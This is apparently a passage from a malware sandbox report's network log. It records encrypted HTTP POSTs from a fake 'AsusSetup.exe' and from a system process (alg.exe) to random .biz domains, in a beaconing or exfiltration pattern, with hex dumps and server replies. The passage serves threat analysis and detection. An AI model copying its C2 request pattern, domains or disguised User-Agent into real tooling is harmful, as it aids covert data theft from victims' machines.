                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:04.395936012 CET798OUTData Raw: cd 14 29 1b e0 34 ff 35 12 03 00 00 7e 06 63 24 56 9b d7 58 ed db 25 96 a7 42 01 bf 76 55 3e a7 39 c9 66 86 f7 a3 28 0b 01 cd 0c 9a 5c cf 18 87 68 9c 86 2e 31 94 47 ef 22 28 92 fd c9 19 28 70 7c 8b cf cd 71 79 f7 21 e2 e6 82 87 6c ab 2e 06 ed 91
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: )45~c$VX%BvU>9f(\h.1G"((p|qy!l.]bTl;WE)EGI#(?W/25;Z,5S;}_'EF1JoZKWQf.Cu<=4%qww?$9utI0hps@?9
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:05.225667953 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=34ebcb8f7092c4833af3791f46b7a276|155.94.241.188|1730129825|1730129825|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        1192.168.2.44973118.141.10.107806452C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:05.302685976 CET349OUTPOST /spoyvi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 798
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:05.302704096 CET798OUTData Raw: 26 7d 0f 83 dc 27 f4 73 12 03 00 00 1d 6d d1 a2 f4 14 39 9d 8d df 9e a8 ef 9f 2d 63 ac 70 dd 08 8b 3b 1f 65 1e 33 6e b4 b5 16 0e 9f 15 78 9d 87 41 6c 16 44 7d fb a1 46 64 c5 e7 48 bb e5 5a 43 8d 8b 0f 1b d5 5d 78 46 21 4c d2 54 c4 42 0f fc 88 bb
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: &}'sm9-cp;e3nxAlD}FdHZC]xF!LTB4hDwmP?c!xmKP1>|,UmFDcuG_.[G]U0uNm+&0w}&Tf|^-J~PKq$@\h*t_2])-[!
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:06.748608112 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:06 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=da1fcb88307a930282705adb162218bf|155.94.241.188|1730129826|1730129826|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        2192.168.2.44973254.244.188.177806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:05.363671064 CET361OUTPOST /fnkotvtiwfwjvbky HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:05.363697052 CET778OUTData Raw: c0 d4 cf 63 8d 13 61 05 fe 02 00 00 43 3a d9 8a 13 84 33 0b db b6 63 08 f2 35 c1 b7 07 ce 39 ef 52 dd 2f 7c 09 0f 14 58 88 6e 48 7f 67 d2 9a e0 21 6c 41 0e 64 df a7 29 6b b6 37 ac 05 e8 92 65 5c bd fc 67 17 7d 60 40 5b c4 de ab 34 ca 02 63 f9 47
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: caC:3c59R/|XnHg!lAd)k7e\g}`@[4cG^n-TrRGA:|QaEhq mJ7p2p)*Ca`agYAAUk87I/@7FO!u!L51%Foo&Mm};^tQ>-kyJ
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:06.196400881 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:06 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=3c6cbe0f74c782a8da2a90408d98f3f5|155.94.241.188|1730129826|1730129826|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        3192.168.2.44973318.141.10.107806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:06.271759987 CET346OUTPOST /aay HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:06.272067070 CET778OUTData Raw: 83 e3 be ea 22 70 11 42 fe 02 00 00 3d f9 a5 e3 50 32 bd 82 7c d4 3d c9 2e 3e 27 95 61 b8 13 30 f3 49 79 bb 41 9c ff 6b 46 73 67 20 0e 12 7f 45 fb 9b 45 59 d6 92 f6 1d 2e 2d ad de 41 ce 0d bf 1c ef bf 70 36 7d 5b 55 14 51 21 0e 6e e3 f2 ac e1 74
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: "pB=P2|=.>'a0IyAkFsg EEY.-Ap6}[UQ!nttuyV"XJRg_'8 v2(<WWM7jt1}{{a85$_u!^"g)zX#;F>mm':pVQZMSWE/V\}V8^B_D(.NPjeh
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:07.732702017 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:07 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=c8295afbcdf886afd0410df5f0eaafd0|155.94.241.188|1730129827|1730129827|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        4192.168.2.44973454.244.188.177806452C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:06.816139936 CET342OUTPOST /y HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 798
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:06.816159964 CET798OUTData Raw: c8 9d d1 51 ea 7c a0 d9 12 03 00 00 b2 0a 14 dd 00 2a 38 ad d5 d6 90 7e f6 d8 95 66 cb 5c 45 58 41 b3 c4 19 ce 79 f9 5e da 14 9e dc 92 84 28 92 be 78 9c 81 f4 cc e1 d0 5e 07 78 3f ea 73 c2 e3 f3 be 37 05 c6 a9 97 78 86 55 d0 b4 1a 46 6e eb 4b dd
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Q|*8~f\EXAy^(x^x?s7xUFnK'2AhE)X'+[`]MP+Y<>;S>2uU#U?*"4\2^E(D wnx$1pa9K io6DZUq-7e8j
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:07.677804947 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:07 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=c683675103f8ff3a74dbaf3ee487f31e|155.94.241.188|1730129827|1730129827|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        5192.168.2.44973544.221.84.105806452C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:07.929778099 CET353OUTPOST /ywrwbyxrs HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 798
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:07.929807901 CET798OUTData Raw: 81 de e9 17 8f 52 f6 f1 12 03 00 00 7a 6c a0 a9 49 ad 1a 1e c0 e6 d5 6b 58 37 53 f2 51 6b 10 a7 4d 98 30 e7 c3 df 73 f6 05 b0 fd 9d 96 6e 98 60 26 be 9f a3 92 28 cb f4 6a ec 63 59 e6 c5 cc 1b 16 3d d7 eb 65 88 a6 b0 5b 72 ad d5 d4 4d 56 ba 51 2c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: RzlIkX7SQkM0sn`&(jcY=e[rMVQ,nAO+up(-5scwf5:k>i@]D(I~I$P8Ia~.uS<3r\9h~ ?LfK5;/M*UQHb/S/1~HZLV
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.618495941 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:08 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=1187972bfb1ec9cba29b2ee145ed4e96|155.94.241.188|1730129828|1730129828|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        6192.168.2.44973654.244.188.177806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.031359911 CET344OUTPOST /ils HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.031398058 CET778OUTData Raw: 9d eb 8f ec 2a dc 36 c6 fe 02 00 00 aa 7a 17 96 22 4e 16 3a 01 08 a6 80 37 92 e0 7d 6e 93 f0 94 b1 05 da 42 45 91 af b1 4b 1b dc 18 28 6c da 7e 64 2b d4 66 ec 7a 54 0b 9d a7 8c 6d 11 e1 83 63 f7 34 12 50 10 81 1d 33 64 a3 35 f4 98 9d 2a a6 5c 8e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: *6z"N:7}nBEK(l~d+fzTmc4P3d5*\M'5Bs-AQ%LH9#w\`ly[=gAeP,(ia-ccYZLs"6e1asvm;(uoHfDt3[/3Ei,{iB
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.865279913 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:08 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=38387cc5197bb037118ceb86a3854c8a|155.94.241.188|1730129828|1730129828|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        7192.168.2.44973744.221.84.105806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.937984943 CET356OUTPOST /beqepswmsyxa HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.938003063 CET778OUTData Raw: 2c 33 fa 7f 16 cd 5f f7 fe 02 00 00 e8 d3 45 10 a0 31 67 c7 01 96 bf bd e3 d5 c9 a3 19 72 42 dc 6f 21 66 a4 68 e3 06 99 01 1f 11 c2 5e 08 c4 12 a0 40 b3 10 b7 3c 02 c4 b7 65 13 df 4c 3a dc e9 41 0e a6 80 ab da db f1 8c df 47 5d b7 6a 02 fc 1c 37
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ,3_E1grBo!fh^@<eL:AG]j7&5R;d_{]U(c2q]<v97jP'Ot$[WSR=)TwjZ=dmuuw9!cRF%<;vN$Ql{yVZ


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        8192.168.2.44973844.221.84.105806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:09.375129938 CET355OUTPOST /rdbyhsstwxr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:09.375129938 CET778OUTData Raw: 0a 78 0a 32 d3 95 8d 5f fe 02 00 00 47 23 85 4e ee 31 f6 22 9e 66 54 6d 5a 58 9f 68 cc 91 c8 be 8c 52 4e 8d fb a6 5d 29 ce 1c 5d aa 1c 12 ec 9e 29 3d e4 e2 e4 d2 c8 16 6f b2 6f 16 4f 04 ec 5d c5 6b a3 f1 aa a3 71 a7 ff 4e 91 8d 31 02 72 dd 9f 16
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: x2_G#N1"fTmZXhRN])])=ooO]kqN1r9~L|L-#.O&&Ax }]hO SVX^b\K8o2x}@l]@p"s92|r{NuV-c<FcrxZ(UU|5m|
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.040299892 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:09 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=ef3614c938c2e6e944876d710e030ba7|155.94.241.188|1730129829|1730129829|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        9192.168.2.449739172.234.222.143806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.144428015 CET347OUTPOST /dbhv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.144540071 CET778OUTData Raw: 1b 1f 5b 03 67 d2 b8 c4 fe 02 00 00 53 d3 9e 9b 81 29 e2 c2 26 60 1f 95 47 11 66 4c 1c 42 21 cd 53 bd 45 a2 ba 87 f3 15 f5 d2 11 80 47 1c e7 e2 ac 45 d5 31 3d d2 e8 68 78 f3 3b 15 49 a3 34 31 35 2d da ac 32 ff 21 12 f7 35 dd b8 95 30 4e 97 d0 fe
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: [gS)&`GfLB!SEGE1=hx;I415-2!50N)ls1}G5yy+\6g~N1F)]fn`gp4^5@8`eJfsl&uoNP"9T<f\{+X?Nc)p


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        10192.168.2.449740172.234.222.143806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.840492010 CET355OUTPOST /uyurjsjwfnxw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.840492010 CET778OUTData Raw: 5b ab a0 00 56 61 c5 fc fe 02 00 00 c2 3f 03 59 28 4a 6d ca d1 b9 6c a2 37 25 ab db b3 97 d4 10 b3 31 dd 2b 0b 7a 31 9b 38 0a 1c dd 55 ea bc f3 b7 9c e0 9a 93 3c ec 2c c4 bc 27 a0 c2 9a 8e 58 2b 4b 49 00 7d 00 71 b0 16 a3 55 81 b5 ce 79 e2 30 7a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: [Va?Y(Jml7%1+z18U<,'X+KI}qUy0zroZ>k*vw?oVM@;~h+#;OjvRDD6R7K9q1O5'5+Zbq&"$XJw*6i7AD4k]a


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        11192.168.2.44974118.141.10.107806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:11.635205984 CET353OUTPOST /qmxhsynps HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:11.635219097 CET778OUTData Raw: d1 e3 2e bc f2 20 d6 e8 fe 02 00 00 6a 5e f7 dc 2a 38 ab 07 53 c1 da 5b 81 26 94 28 ac 11 13 8c d6 a2 29 06 a9 58 ae 16 d4 45 5f 0d 12 30 bc 2e 97 40 73 e4 f0 c4 97 ca 7e df f7 1c 38 d6 fe 52 99 6f 12 01 fb e8 85 85 7e 0f be c7 69 a0 10 26 d4 4c
